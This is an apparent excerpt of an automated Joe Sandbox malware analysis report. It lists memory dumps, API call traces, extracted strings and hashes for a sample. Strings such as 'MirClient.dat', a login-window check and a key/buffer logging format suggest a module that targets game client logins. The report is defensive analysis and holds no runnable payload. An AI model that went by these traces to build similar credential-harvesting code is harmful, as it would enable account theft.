                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateCriticalEnterFontIndirectSection
                                                                                  • String ID: MS Sans Serif$Default
                                                                                  • API String ID: 2931345757-2137701257
                                                                                  • Opcode ID: 105edd788817563fcbd3fb300845dd2bbd06086720aef2cd4f7d8f74d6d981d2
                                                                                  • Instruction ID: e8f0a59671a40c80fae08309f8953901989574ac193d6229334b477ebdec3613
                                                                                  • Opcode Fuzzy Hash: 105edd788817563fcbd3fb300845dd2bbd06086720aef2cd4f7d8f74d6d981d2
                                                                                  • Instruction Fuzzy Hash: 1A516930A04288DFDB11CFA8D581FCEBBF6AF49304F5590A5E800A7392D374AE05CB65
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: __fdopen
                                                                                  • String ID: +$t
                                                                                  • API String ID: 194168367-1842947216
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: _memset
• String ID: .sys$\SystemRoot\
• API String ID: 2102423945-3490909580
APIs
• GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0BE9D38A), ref: 0BE9D332
• GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0BE9D38A), ref: 0BE9D338
Strings
Memory Dump Source
• Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
Similarity
• API ID: DateFormatLocaleThread
• String ID: yyyy
• API String ID: 3303714858-3145165042
APIs
• _memset.LIBCMT ref: 6A6DB186
  • Part of subcall function 6A6DB0A0: _memset.LIBCMT ref: 6A6DB0C8
• _memset.LIBCMT ref: 6A6DB1C1
  • Part of subcall function 6A6DB5E0: CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6A6DB648
  • Part of subcall function 6A6DB5E0: CryptMsgGetParam.CRYPT32(?,00000006,00000000,00000000,?), ref: 6A6DB66A
  • Part of subcall function 6A6DB5E0: LocalAlloc.KERNEL32(00000040,?), ref: 6A6DB67B
  • Part of subcall function 6A6DB5E0: CryptMsgGetParam.CRYPT32(?,00000006,00000000,00000000,?), ref: 6A6DB695
  • Part of subcall function 6A6DB5E0: _printf.LIBCMT ref: 6A6DB6AC
  • Part of subcall function 6A6DB5E0: CertFindCertificateInStore.CRYPT32(?,00010001,00000000,000B0000,?,00000000), ref: 6A6DB6E6
Strings
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: Crypt_memset$Param$AllocCertCertificateFindLocalObjectQueryStore_printf
• String ID: Chongqing Intelligent Information Tech Co.,Ltd.
• API String ID: 542608461-828530063
APIs
• _memset.LIBCMT ref: 6A6D7F46
  • Part of subcall function 6A6E0470: GetModuleHandleA.KERNEL32 ref: 6A6E052A
  • Part of subcall function 6A6E0470: GetProcAddress.KERNEL32(00000000), ref: 6A6E0531
  • Part of subcall function 6A6DB0A0: _memset.LIBCMT ref: 6A6DB0C8
• _memset.LIBCMT ref: 6A6D7F8A
  • Part of subcall function 6A6DB5E0: CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6A6DB648
  • Part of subcall function 6A6DB5E0: CryptMsgGetParam.CRYPT32(?,00000006,00000000,00000000,?), ref: 6A6DB66A
  • Part of subcall function 6A6DB5E0: LocalAlloc.KERNEL32(00000040,?), ref: 6A6DB67B
  • Part of subcall function 6A6DB5E0: CryptMsgGetParam.CRYPT32(?,00000006,00000000,00000000,?), ref: 6A6DB695
  • Part of subcall function 6A6DB5E0: _printf.LIBCMT ref: 6A6DB6AC
  • Part of subcall function 6A6DB5E0: CertFindCertificateInStore.CRYPT32(?,00010001,00000000,000B0000,?,00000000), ref: 6A6DB6E6
Strings
• Shanghai Huizun Industries Co., Ltd., xrefs: 6A6D7FC4
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: Crypt_memset$Param$AddressAllocCertCertificateFindHandleLocalModuleObjectProcQueryStore_printf
• String ID: Shanghai Huizun Industries Co., Ltd.
• API String ID: 3606257896-2979844265
APIs
Strings
• keyname is : %s, buffer is : %s, length is : %d, xrefs: 6A6D50F5
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: _memset_sprintf
• String ID: keyname is : %s, buffer is : %s, length is : %d
• API String ID: 1557529856-1723146052
APIs
• _memset.LIBCMT ref: 6A6D9CE8
  • Part of subcall function 6A6E05A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000,?), ref: 6A6E05C3
  • Part of subcall function 6A6E05A0: _memset.LIBCMT ref: 6A6E05DA
  • Part of subcall function 6A6E05A0: Process32First.KERNEL32 ref: 6A6E05F0
  • Part of subcall function 6A6E05A0: CloseHandle.KERNEL32(00000000), ref: 6A6E05FA
Strings
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: _memset$CloseCreateFirstHandleProcess32SnapshotToolhelp32
• String ID: 91Client.dat$MirClient.dat
• API String ID: 113637525-146612288
                                                                                  APIs
                                                                                  • GetSystemMetrics.USER32(00000000), ref: 0BEB2445
                                                                                  • GetSystemMetrics.USER32(00000001), ref: 0BEB2451
                                                                                    • Part of subcall function 0BEB2284: GetProcAddress.KERNEL32(75A50000,00000000), ref: 0BEB2304
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: MetricsSystem$AddressProc
                                                                                  • String ID: MonitorFromRect
                                                                                  • API String ID: 1792783759-4033241945
                                                                                  APIs
                                                                                  Strings
                                                                                  • file path: %s, md5 :%s, match val : %d, xrefs: 6A6E0C7B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset_sprintf
                                                                                  • String ID: file path: %s, md5 :%s, match val : %d
                                                                                  • API String ID: 1557529856-2925406424
                                                                                  APIs
                                                                                    • Part of subcall function 6A701722: __getptd.LIBCMT ref: 6A701728
                                                                                    • Part of subcall function 6A701722: __getptd.LIBCMT ref: 6A701738
                                                                                  • __getptd.LIBCMT ref: 6A70DEC8
                                                                                    • Part of subcall function 6A705883: __getptd_noexit.LIBCMT ref: 6A705886
                                                                                    • Part of subcall function 6A705883: __amsg_exit.LIBCMT ref: 6A705893
                                                                                  • __getptd.LIBCMT ref: 6A70DED6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                  • String ID: csm
                                                                                  • API String ID: 803148776-1018135373
                                                                                  APIs
                                                                                  • OutputDebugStringA.KERNEL32(IsPorcWithTargetClass : login window,75ADA040,6A6DAA32,00000000), ref: 6A6DB998
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6DB99F
                                                                                  Strings
                                                                                  • IsPorcWithTargetClass : login window, xrefs: 6A6DB997
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString
                                                                                  • String ID: IsPorcWithTargetClass : login window
                                                                                  • API String ID: 1166629820-4015989340
                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(6A72CFE8,?,6A72CFCC,6A72CFE8,6A72CFCC,?,6A6F3FA9,00000000,00000000,?,?,?,?,6A6F02CE,00000000,00000000), ref: 6A6F3F29
                                                                                  • LeaveCriticalSection.KERNEL32(6A72CFE8,00000000,?,6A6F3FA9,00000000,00000000,?,?,?,?,6A6F02CE,00000000,00000000,000000FF,00000010,6A6EE047), ref: 6A6F3F39
                                                                                  • LocalFree.KERNEL32(?,?,6A6F3FA9,00000000,00000000,?,?,?,?,6A6F02CE,00000000,00000000,000000FF,00000010,6A6EE047,?), ref: 6A6F3F42
                                                                                  • TlsSetValue.KERNEL32(6A72CFCC,00000000,?,6A6F3FA9,00000000,00000000,?,?,?,?,6A6F02CE,00000000,00000000,000000FF,00000010,6A6EE047), ref: 6A6F3F54
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                  • String ID:
                                                                                  • API String ID: 2949335588-0
                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(6A72D1A0,?,?,00000000,?,6A6F3A94,00000010,00000008,6A6F393F,6A6F38E2,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F41C7
                                                                                  • InitializeCriticalSection.KERNEL32(?,?,00000000,?,6A6F3A94,00000010,00000008,6A6F393F,6A6F38E2,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F41D9
                                                                                  • LeaveCriticalSection.KERNEL32(6A72D1A0,?,00000000,?,6A6F3A94,00000010,00000008,6A6F393F,6A6F38E2,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F41E6
                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,00000000,?,6A6F3A94,00000010,00000008,6A6F393F,6A6F38E2,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F41F6
                                                                                    • Part of subcall function 6A6EE232: __CxxThrowException@8.LIBCMT ref: 6A6EE248
                                                                                    • Part of subcall function 6A6EE232: __EH_prolog3.LIBCMT ref: 6A6EE255
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
• String ID:
• API String ID: 2895727460-0
• Opcode ID: 20ee4ab903277299c3cd81c8919655c4f181749ac86f1b182427652942d5232f
• Instruction ID: 73719ce6b3104503a9adc268577d6503ff0dd237761061da1112d25325d9d82f
• Opcode Fuzzy Hash: 20ee4ab903277299c3cd81c8919655c4f181749ac86f1b182427652942d5232f
• Instruction Fuzzy Hash: 2EF0C2321401056FEF206A95CE8C655BAFAEFA2316F660425F10082902CF78A947CA6D
APIs
• EnterCriticalSection.KERNEL32(6A72CFE8,?,?,00000000,?,6A6F4024,?,00000004,6A6F3920,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F39D6
• TlsGetValue.KERNEL32(6A72CFCC,?,00000000,?,6A6F4024,?,00000004,6A6F3920,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F39EA
• LeaveCriticalSection.KERNEL32(6A72CFE8,?,00000000,?,6A6F4024,?,00000004,6A6F3920,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F3A00
• LeaveCriticalSection.KERNEL32(6A72CFE8,?,00000000,?,6A6F4024,?,00000004,6A6F3920,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F3A0B
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: CriticalSection$Leave$EnterValue
• String ID:
• API String ID: 3969253408-0
• Opcode ID: 92e64f79c9c5d14deed59d8ee8008380a148a3ccc2522ec568452619782efdef
• Instruction ID: bfea4384c9bc24d43e7d9b22a4762b45544c74d87d0721edcfd413dab813c85a
• Opcode Fuzzy Hash: 92e64f79c9c5d14deed59d8ee8008380a148a3ccc2522ec568452619782efdef
• Instruction Fuzzy Hash: 80F05E77204605AFD7209F5AD888C46BBFAFA853A131A5866F416D3501EA74FC038EA5